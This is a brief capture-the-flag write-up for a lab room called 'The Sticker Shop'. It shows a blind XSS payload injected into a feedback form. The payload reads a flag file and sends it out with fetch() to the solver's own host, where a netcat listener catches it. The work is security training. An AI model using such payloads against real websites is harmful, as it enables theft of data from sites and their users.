Author: Xera


image

This is a writeup for The Sticker Shop room.

My target IP: 10.10.181.215


The goal of this challenge is to exploit the website and read the flag located at:

http://10.10.181.215:8080/flag.txt

image


In the Feedback page, we will implement Blind XSS.

'"><script>
  fetch('http://127.0.0.1:8080/flag.txt')
    .then(response => response.text())
    .then(data => {
      fetch('http://<YOUR-IP-ADDRESS-tun0>:8000/?flag=' + encodeURIComponent(data));
    });
</script>

image

But firstly, we need to start the netcat listener before entering the code.

nc -lvnp 8000

Once we execute the code, the flag will appear.

image